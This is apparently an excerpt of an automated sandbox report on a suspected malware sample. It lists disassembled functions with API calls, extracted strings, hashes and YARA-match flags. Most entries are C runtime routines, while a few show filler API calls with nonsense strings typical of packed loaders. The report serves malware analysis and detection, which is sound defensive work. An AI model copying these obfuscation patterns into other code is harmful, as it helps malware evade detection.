                                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                • Instruction Fuzzy Hash: 20012C768206629BD701DF3EC8C045AFBF1BB082117528B26DC9083A41D334E662DBE4
                                APIs
                                • InterlockedIncrement.KERNEL32(00429CB0), ref: 00410CD3
                                • __invoke_watson_if_error.LIBCMTD ref: 00410D12
                                • OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 00410D1F
                                • OutputDebugStringA.KERNEL32(\<B), ref: 00410D47
                                • OutputDebugStringA.KERNEL32(, Line ), ref: 00410D52
                                • OutputDebugStringA.KERNEL32(?), ref: 00410D5F
                                • OutputDebugStringA.KERNEL32(00423C50), ref: 00410D6A
                                • _wcscat_s.LIBCMTD ref: 00410F2A
                                  • Part of subcall function 00413E80: __invalid_parameter.LIBCMTD ref: 00413EF2
                                • __invoke_watson_if_error.LIBCMTD ref: 00410F33
                                  • Part of subcall function 004050F0: __invoke_watson.LIBCMTD ref: 00405111
                                • _wcscat_s.LIBCMTD ref: 00410F62
                                  • Part of subcall function 00413E80: _memset.LIBCMT ref: 00413F5B
                                  • Part of subcall function 00413E80: __invalid_parameter.LIBCMTD ref: 00413FB7
                                • __invoke_watson_if_error.LIBCMTD ref: 00410F6B
                                • __snwprintf_s.LIBCMTD ref: 00410FC4
                                  • Part of subcall function 004103C0: __vsnprintf_s_l.LIBCMTD ref: 004103E2
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00410FFD
                                • _wcscpy_s.LIBCMTD ref: 00411042
                                • __invoke_watson_if_error.LIBCMTD ref: 0041104B
                                • __cftoe.LIBCMTD ref: 004110BF
                                • __invoke_watson_if_oneof.LIBCMTD ref: 004110EE
                                • _wcscpy_s.LIBCMTD ref: 00411126
                                • __invoke_watson_if_error.LIBCMTD ref: 0041112F
                                • __itow_s.LIBCMTD ref: 00410D09
                                  • Part of subcall function 00419A80: _xtow_s@20.LIBCMTD ref: 00419AAB
                                • __strftime_l.LIBCMTD ref: 00410DC9
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00410E02
                                • _wcscpy_s.LIBCMTD ref: 00410E47
                                • __invoke_watson_if_error.LIBCMTD ref: 00410E50
                                • _wcscpy_s.LIBCMTD ref: 00410EA3
                                • __invoke_watson_if_error.LIBCMTD ref: 00410EAC
                                • _wcscat_s.LIBCMTD ref: 00410EDD
                                • __invoke_watson_if_error.LIBCMTD ref: 00410EE6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
                                • String ID: %s(%d) : %s$(*_errno())$, Line $Second Chance Assertion Failed: File $\<B$_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                                APIs
                                Strings
                                Similarity
                                • API ID: ___check_float_string$__inc$Locale_isdigit$UpdateUpdate::~___filbuf
                                • String ID: +
                                APIs
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F3B
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F71
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F92
                                • wcsncnt.LIBCMTD ref: 00419FC9
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419FFA
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041A02F
                                • _wcslen.LIBCMTD ref: 0041A23F
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041A24D
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide_wcslenwcsncnt
                                • String ID:
                                APIs
                                Strings
                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 0040365A
                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 004033B9
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00403621
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040344D, 004034AB, 00403666
                                • u!h@B, xrefs: 0040343F
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403529
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00403567
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 004035E3
                                • _CrtIsValidHeapPointer(pUserData), xrefs: 00403441
                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040349F
                                • Client hook free failure., xrefs: 0040340C
                                • tDj, xrefs: 004033EB
                                Similarity
                                • API ID: BytesCheck$HeapPointerValid__free_base_memset
                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj$u!h@B
                                APIs
                                Strings
                                Similarity
                                • API ID: __inc$__hextodec__un_inc_isxdigit
                                • String ID: 8$F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3451365851-3266125857
                                • Opcode ID: 50d74972829789f5f90c135b0cc8a8d432cd2b48722598bab90b9263e28168cd
                                • Instruction ID: 9e84b599b5647acd1f0575450b0ce3e93d46b55b7b01ba4b9b02784904280f37
                                • Opcode Fuzzy Hash: 50d74972829789f5f90c135b0cc8a8d432cd2b48722598bab90b9263e28168cd
                                • Instruction Fuzzy Hash: 6DF129B1D052299FEB24DF58CC89BEEB7B5BB44304F14819AE409A7281D7389EC0CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3455034128-2408376751
                                • Opcode ID: 81b342c3de4b81c4f193326606ea6beaa0a6bc9959ef302e784d200aef1d6cf9
                                • Instruction ID: 7198dd68fd240182f9831290eba8b3e1152ec5318d6a16943d17656d53a6a5b4
                                • Opcode Fuzzy Hash: 81b342c3de4b81c4f193326606ea6beaa0a6bc9959ef302e784d200aef1d6cf9
                                • Instruction Fuzzy Hash: 67F13AB19002299FDB24CF54CC85BAEB7B5FB85304F1441AAE609B7281D7389E84CF5E
                                APIs
                                • __get_printf_count_output.LIBCMTD ref: 00417529
                                • __invalid_parameter.LIBCMTD ref: 004175B0
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004175C5
                                • _write_multi_char.LIBCMTD ref: 00417B3E
                                • _write_string.LIBCMTD ref: 00417B59
                                • _write_multi_char.LIBCMTD ref: 00417B85
                                • _wctomb_s.LIBCMTD ref: 00417C02
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_wctomb_s_write_string
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 4103101190-2363074782
                                • Opcode ID: 940be81e2a341b2a71ae495fb6ade5a5bd19aa91271bae1eb43d3d1588974342
                                • Instruction ID: 4d83509c2fbd25f8b4bd126f7decccbf39e2d0613780b551442f717b8b193385
                                • Opcode Fuzzy Hash: 940be81e2a341b2a71ae495fb6ade5a5bd19aa91271bae1eb43d3d1588974342
                                • Instruction Fuzzy Hash: F3A17E70E092289BDF24DF55CC89BEEB7B1AB44305F1481DAE4197A281E7789EC0CF59
                                APIs
                                • __get_printf_count_output.LIBCMTD ref: 0040AC0C
                                • __invalid_parameter.LIBCMTD ref: 0040AC93
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0040ACA8
                                • _write_multi_char.LIBCMTD ref: 0040B23B
                                • _write_string.LIBCMTD ref: 0040B256
                                • _write_multi_char.LIBCMTD ref: 0040B282
                                • __mbtowc_l.LIBCMTD ref: 0040B2F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_write_string
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 900999819-1989478660
                                • Opcode ID: bc9228824b490252d205db984fcd876d868e63ab9bc971916b5465e00f6a7851
                                • Instruction ID: 50601d3e0531b0588c2bb1b5147752684b48b2b10e321c2d725c09cb2447f8df
                                • Opcode Fuzzy Hash: bc9228824b490252d205db984fcd876d868e63ab9bc971916b5465e00f6a7851
                                • Instruction Fuzzy Hash: 28A160B09002289BDB24DF55CC85BAEB774EB44304F1484EAE6097B2C2D7789E84CF5E
                                APIs
                                Strings
                                • strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 0040E09A
                                • (*_errno()), xrefs: 0040E05D
                                • ..., xrefs: 0040DF97, 0040E00E
                                • Microsoft Visual C++ Debug Library, xrefs: 0040E0C6
                                • __crtMessageWindowA, xrefs: 0040E058, 0040E095
                                • Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application), xrefs: 0040E025
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c, xrefs: 0040E053, 0040E090
                                • _CrtDbgReport: String too long or IO Error, xrefs: 0040E09F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
                                • String ID: (*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1485069716-310124888
                                • Opcode ID: 7100a534ce97518ffe7d03be812db5348420b203e7e00c6074795d7f679a1ea8
                                • Instruction ID: 96cf9c2e9b25c396088fcc663dc55a34938e120d9734740b5c7e635f4373f3c5
                                • Opcode Fuzzy Hash: 7100a534ce97518ffe7d03be812db5348420b203e7e00c6074795d7f679a1ea8
                                • Instruction Fuzzy Hash: 5931A470B40228BBCB24DB91DC42FDAB3746B58705F0085AAF709772C1D6BC5B908F99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _write_multi_char$_strlen_wctomb_s_write_string
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 433996309-3257747220
                                • Opcode ID: 55a63bbf500c120894551c3e6a08c3f4aebf5a0a65057ba823adc84a8df4a850
                                • Instruction ID: e66655f8806d7c8cbde8537ac2bfda897eeaa8f574f1db698dcfd8e6f16f1032
                                • Opcode Fuzzy Hash: 55a63bbf500c120894551c3e6a08c3f4aebf5a0a65057ba823adc84a8df4a850
                                • Instruction Fuzzy Hash: 1BA16AB4D052289BDB24CF54CC89BEEB7B1AB48305F1481DAE4196B281E7789EC0CF59
                                APIs
                                Strings
                                • Error: memory allocation: bad memory block type., xrefs: 004027E4
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040269F
                                • _CrtCheckMemory(), xrefs: 00402693
                                • Client hook allocation failure at file %hs line %d., xrefs: 00402728
                                • Client hook allocation failure., xrefs: 00402745
                                • Invalid allocation size: %Iu bytes., xrefs: 00402793
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _memset$CheckMemory__heap_alloc_base
                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 4254127243-2462871736
                                • Opcode ID: d6097b060a62439e2152c6dc02346f7700921db991c2b7b29aa7b3065ddfcecf
                                • Instruction ID: 3a710de15ead0d29ef39a83c8592ab52a46c7b78c449804f59a33d05e5b31229
                                • Opcode Fuzzy Hash: d6097b060a62439e2152c6dc02346f7700921db991c2b7b29aa7b3065ddfcecf
                                • Instruction Fuzzy Hash: DFA17F74A002059FDB24DF45DA89B9A77F1BB88314F20826AE9057B3D1D3B9AD40CF9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _write_multi_char$__mbtowc_l_strlen_write_string
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3252303123-2264504294
                                • Opcode ID: 3c303c824d7fffb96db92174ffbaa8836be3c7a50a02f88503ca757337f2be7c
                                • Instruction ID: 3f904ac5b13f381e4a3ba85f902fbcbc3f7a825f9bd1bb949450c76b77106929
                                • Opcode Fuzzy Hash: 3c303c824d7fffb96db92174ffbaa8836be3c7a50a02f88503ca757337f2be7c
                                • Instruction Fuzzy Hash: 3CA15DB1D002189BDB24CF55CD85BAEB7B5EB44304F1481AAE6097B282D7789E84CF5E
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:
                                • API String ID: 1442030790-0
                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction ID: 43e677761a587c9b91b48a77f13585c6602ced2ed840fcb28a0ee1d72538e486
                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction Fuzzy Hash: 5B21CFF2624301BAE7333FE5CC01E2B7BEEDF42760B508029E548550ACEB628560CE58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale__inc$UpdateUpdate::~___mbtowc_l__un_inc_memset
                                • String ID: $]${${
                                • API String ID: 2643002128-1336171634
                                • Opcode ID: a27df5cfc8be1d50458e865ef07640ca86c8d6c28c443dcdd830912afdda915c
                                • Instruction ID: a55bc354a5c1ddee6c691bf7f824df5111db2af8bf9357ee96e76c7a3c3def74
                                • Opcode Fuzzy Hash: a27df5cfc8be1d50458e865ef07640ca86c8d6c28c443dcdd830912afdda915c
                                • Instruction Fuzzy Hash: CAB1B570D092989BCF15CBA9C4906FDBBB1AF46304F14C1AFE8A97B382C6385A45CF55
                                APIs
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EF20
                                • DeleteVolumeMountPointA.KERNEL32(Gatuwoxa yudesozuja nuxo bavisiyoxopav), ref: 0041EFAC
                                • GetSystemPowerStatus.KERNEL32(00000000), ref: 0041EFC9
                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EFDE
                                • OpenThread.KERNEL32(00000000,00000000,00000000), ref: 0041F005
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F00F
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041F017
                                • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 0041F04D
                                • GetPrivateProfileSectionNamesW.KERNEL32(?,00000000,00000000), ref: 0041F08D
                                • GlobalFix.KERNEL32(00000000), ref: 0041F095
                                • LocalLock.KERNEL32(00000000), ref: 0041F0BA
                                • WriteProfileStringA.KERNEL32(Nawihuxoxu,Neyobatud ziyigo fuhuruh mag puyojidiz,Ribomavepahi bulihunosawimu pofuno nupoji), ref: 0041F0CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ProfileVolume$BoostCreateDeleteGlobalInformationLatencyLocalLockMountMultipleNamesObjectObjectsOpenPointPowerPriorityPrivateProcessRequestSectionStatusStringSystemThreadWaitWakeupWrite
                                • String ID: $Gatuwoxa yudesozuja nuxo bavisiyoxopav
                                • API String ID: 2940459343-2894084202
                                • Opcode ID: e5892b2106d80f3332c741eaeab687b45e52fa1cce8384dfb5169f295ec77b41
                                • Instruction ID: 618d0c281e6e2d461271ab7a7dd81734c2ce3b673418e8be139b9d5285146930
                                • Opcode Fuzzy Hash: e5892b2106d80f3332c741eaeab687b45e52fa1cce8384dfb5169f295ec77b41
                                • Instruction Fuzzy Hash: B04114B0E05209DFDBA0CFA8E946BAEB7B0FF08705F108129E515B7291C3746A45CF5A
                                APIs
                                • std::exception::exception.LIBCMT ref: 0225FC1F
                                  • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                • __CxxThrowException@8.LIBCMT ref: 0225FC34
                                • std::exception::exception.LIBCMT ref: 0225FC4D
                                • __CxxThrowException@8.LIBCMT ref: 0225FC62
                                • std::regex_error::regex_error.LIBCPMT ref: 0225FC74
                                  • Part of subcall function 0225F914: std::exception::exception.LIBCMT ref: 0225F92E
                                • __CxxThrowException@8.LIBCMT ref: 0225FC82
                                • std::exception::exception.LIBCMT ref: 0225FC9B
                                • __CxxThrowException@8.LIBCMT ref: 0225FCB0
                                Strings
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 0225FCB6
                                • leM, xrefs: 0225FCA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.
                                • API String ID: 3569886845-85255083
                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction ID: 4cace3a36ab4f96211a5124a0b7b9309c5d1ea736ff362843ef9ef6c07d23c3d
                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction Fuzzy Hash: 11110A79C1030DBBCB04FFE5D455CDDBB7DAA04740B408566AD1897244EB74E3988F94
                                APIs
                                • _memset.LIBCMT ref: 02233F51
                                  • Part of subcall function 02235BA8: __getptd_noexit.LIBCMT ref: 02235BA8
                                • __gmtime64_s.LIBCMT ref: 02233FEA
                                • __gmtime64_s.LIBCMT ref: 02234020
                                • __gmtime64_s.LIBCMT ref: 0223403D
                                • __allrem.LIBCMT ref: 02234093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340AF
                                • __allrem.LIBCMT ref: 022340C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340E4
                                • __allrem.LIBCMT ref: 022340FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02234119
                                • __invoke_watson.LIBCMT ref: 0223418A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction ID: 3d594bb0021cdbbe7c166fbaf83174a8e1b95cea3535d1da0ab277559336700b
                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction Fuzzy Hash: 7F71DCB1A20B17ABD719EEB9CC40B5A73B9BF10364F144179E514E6698EB70DA40CBD0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                • API String ID: 3432600739-0
                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction ID: 13070783de127a844da865ecfea733f2e72da22a6ff5c4f06fe18d72e5cf3246
                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction Fuzzy Hash: 4E4124F2924305BFDB02AFE4D980BAE3BFEAF04314F10442DE91496198CBB98544DF19
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                • API String ID: 1022109855-0
                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction ID: 558906d036ddeb4ea88fbf3840553051b634a0af95356c6ea759be9e724f0a94
                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction Fuzzy Hash: 0431C8B3A10351DFCF135F94FC8084977A6FB14324705852AFA085B2B4CBB459C99F96
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                • API String ID: 3721157643-0
                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction ID: e66e6d6fce36724f08fa0e87f28dcffd884ae719a26e05bfbc28b623991f5ddb
                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction Fuzzy Hash: C11136F2A207607AC262A3F40C11FFF7BDD9F45302F0801A9FE9DD1184EA185A149BB1
                                APIs
                                • GetStartupInfoA.KERNEL32(?), ref: 0040D220
                                • GetFileType.KERNEL32(?), ref: 0040D4A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
